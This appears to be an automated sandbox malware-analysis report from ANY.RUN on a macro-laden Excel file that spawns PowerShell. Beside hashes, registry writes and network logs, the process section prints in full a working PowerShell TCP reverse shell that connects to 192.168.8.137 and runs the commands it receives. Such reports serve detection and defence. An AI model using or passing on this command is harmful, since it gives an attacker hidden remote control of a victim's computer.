File name:

1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd

Full analysis: https://app.any.run/tasks/b377eb29-7836-40a2-a77b-b57401477c94
Verdict: Malicious activity
Analysis date: February 21, 2025, 21:27:54
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Feb 19 09:47:44 2025, Last Saved Time/Date: Wed Feb 19 09:47:45 2025, Security: 0
MD5:

8BD2A1B87DFEA71CE57CA37A4C943B03

SHA1:

C7FBEAFF9295B2BC94965ECA03C0BE353F1C67C0

SHA256:

1341E6AA45333396019285AE74C9607E239139BEA07EE71F9A8C8B58F18AAACD

SSDEEP:

384:SycDPRYzrcqE02M+Gk2lgQ6hWWW8iUUGs+NlETh8CWGQSZtClb+tze2MHJ1SBj9Q:xzyupZtqCtzepydYxm1g

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • EXCEL.EXE (PID: 3812)

    • Unusual execution from MS Office

      • EXCEL.EXE (PID: 3812)

    • Microsoft Office executes commands via PowerShell or Cmd

      • EXCEL.EXE (PID: 3812)

  • SUSPICIOUS

    • Possibly malicious use of IEX has been detected

      • EXCEL.EXE (PID: 3812)

    • The process hide an interactive prompt from the user

      • EXCEL.EXE (PID: 3812)

    • Base64-obfuscated command line is found

      • EXCEL.EXE (PID: 3812)

    • Potential TCP-based PowerShell reverse shell connection

      • EXCEL.EXE (PID: 3812)

    • Found IP address in command line

      • powershell.exe (PID: 5316)

    • Runs shell command (SCRIPT)

      • EXCEL.EXE (PID: 3812)

    • The process bypasses the loading of PowerShell profile settings

      • EXCEL.EXE (PID: 3812)

    • Executes script without checking the security policy

      • powershell.exe (PID: 5316)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Никита
LastModifiedBy: Никита
Software: Microsoft Excel
CreateDate: 2025:02:19 09:47:44
ModifyDate: 2025:02:19 09:47:45
Security: None
CodePage: Windows Cyrillic
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: Лист1
HeadingPairs:
  • Листы
  • 1
CompObjUserTypeLen: 27
CompObjUserType: ???? Microsoft Excel 2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
126
Monitored processes
3
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start excel.exe powershell.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3812"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" C:\Users\admin\Desktop\1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd.xlsC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
5316"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -windowstyle 1 -command "$LHOST = \"192.168.8.137\"; $LPORT = 9006; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write(\"$Output`n\"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5856\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 483
Read events
14 228
Write events
234
Delete events
21

Modification events

(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\3812
Operation:writeName:0
Value:
0B0E10D672FC6922968C4295C348D502295F89230046CAE28191F894E1ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511E41DD2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation:writeName:ImmersiveWorkbookDirtySentinel
Value:
0
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation:writeName:ExcelPreviousSessionId
Value:
{69FC72D6-9622-428C-95C3-48D502295F89}
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:1
Value:
01D014000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
Executable files
1
Suspicious files
11
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
3812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\SmartLookupCache\main_ssr.htmlhtml
MD5:7D6057C7DC10F4E7FABBFB73A4C5D921
SHA256:4E4B7401905524A4B9081204B4E87C4CE422E9C7E577EC71CE1BD5A64CC37D84
3812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\SmartLookupCache\microsoft.office.smartlookup.ssr.jsbinary
MD5:9EF3856B434F2A61C83BDC326CA522EC
SHA256:44433C226CC81A762B9B744568D3D96ED890F58D98BC162E65A8EC5A50803B35
3812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\EE94A7D1-4AEB-4C91-ADC9-E63FEF1CDA98xml
MD5:7125C7E63DEAC7D997349A35AF6A1323
SHA256:A3D90C5CD21046E8FB4A123C4543F94422A59D1D99FBC6C1001861F190C20E83
3812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-msbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
3812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd.xls.LNKbinary
MD5:3F1F708A839269DFDD563BB2F9F96A67
SHA256:9315BCBA84285181B1D2B7B58A59CCEAC1384345DC6F35A7A7FC4FCDCE2359AF
5316powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u2pezb0t.kwb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5316powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_04itvvhi.oa1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\SmartLookupCache\dictionary_words_bloom_filter.databinary
MD5:A4AF96BCD3EE55F0CB99B37C806A82A5
SHA256:1BE6D822C31EDC308903E04B986F13388B216DB44019E2BCC3C060284B480BA6
3812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:EA4196180F265F0D0C6EB59C5706AB3F
SHA256:F13B3A4A5B64FBE96E096FC644926A3CF851156CDFD289D9C72C37051E0ED8D4
3812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xmltext
MD5:6E777ED8A64C8D314E44C19C1AB6A99A
SHA256:5635FA87DC677DF7B62C190853B41088759C1A5B765C413F6D67142B3B342FBC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
26
DNS requests
11
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.161:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
HEAD
200
193.108.153.26:443
https://uci.cdn.office.net/mirrored/smartlookup/current/version.json
unknown
GET
200
52.123.128.14:443
https://ecs.office.com/config/v2/Office/excel/16.0.16026.20146/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.16026.20146&MsoVersion=16.0.16026.20002&SDX=fa000000002.2.0.1907.31003&SDX=fa000000005.1.0.1909.30011&SDX=fa000000006.1.0.1909.13002&SDX=fa000000008.1.0.1908.16006&SDX=fa000000009.1.0.1908.6002&SDX=fa000000016.1.0.1810.13001&SDX=fa000000029.1.0.1906.25001&SDX=fa000000033.1.0.1908.24001&SDX=wa104381125.1.0.1810.9001&ProcessName=excel.exe&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=6&LicenseSKU=Professional2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7b69FC72D6-9622-428C-95C3-48D502295F89%7d&LabMachine=false
unknown
tss
388 Kb
whitelisted
GET
200
52.109.28.46:443
https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3
unknown
xml
179 Kb
whitelisted
GET
200
193.108.153.28:443
https://uci.cdn.office.net/mirrored/smartlookup/current/version.json
unknown
binary
78 b
whitelisted
GET
200
193.108.153.26:443
https://uci.cdn.office.net/mirrored/smartlookup/current/dictionary_words_bloom_filter.data
unknown
binary
117 Kb
whitelisted
OPTIONS
400
193.108.153.12:443
https://uci.cdn.office.net/mirrored/smartlookup/current/
unknown
xml
297 b
whitelisted
GET
200
193.108.153.28:443
https://uci.cdn.office.net/mirrored/smartlookup/current/scripts/microsoft.office.smartlookup.ssr.js
unknown
binary
2.50 Mb
whitelisted
GET
200
52.111.236.7:443
https://messaging.lifecycle.office.com/getcustommessage16?app=1&ui=en-US&src=BizBar&messagetype=BizBar&hwid=04111-083-043729&ver=16.0.16026&lc=en-US&platform=10%3A0%3A19045%3A2%3A0%3A0%3A256%3A1%3A&productid=%7B1717C1E0-47D3-4899-A6D3-1022DB7415E0%7D%3A00411-10830-43729-AA720%3AOffice%2019%2C%20Office19Professional2019R_Retail%20edition&clientsessionid=%7B69FC72D6-9622-428C-95C3-48D502295F89%7D&datapropertybag=%7B%22Audience%22%3A%22Production%22%2C%22AudienceGroup%22%3A%22Production%22%2C%22AudienceChannel%22%3A%22CC%22%2C%22Flight%22%3A%22ofsh6c2b1tla1a31%2Cofcrui4yvdulbf31%2Cofhpex3jznepoo31%2Cofpioygfqmufst31%2Cofaa1msspvo2xw31%22%7D
unknown
text
542 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.161:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3976
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3812
EXCEL.EXE
52.109.89.18:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3812
EXCEL.EXE
52.123.128.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
3812
EXCEL.EXE
52.111.236.7:443
messaging.lifecycle.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 23.48.23.161
  • 23.48.23.194
  • 23.48.23.140
  • 23.48.23.164
  • 23.48.23.143
  • 23.48.23.147
  • 23.48.23.150
  • 23.48.23.181
  • 23.48.23.153
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
officeclient.microsoft.com
  • 52.109.89.18
whitelisted
ecs.office.com
  • 52.123.128.14
  • 52.123.129.14
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.7
whitelisted
self.events.data.microsoft.com
  • 20.189.173.24
  • 13.89.179.14
whitelisted
uci.cdn.office.net
  • 193.108.153.26
  • 193.108.153.28
  • 193.108.153.12
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd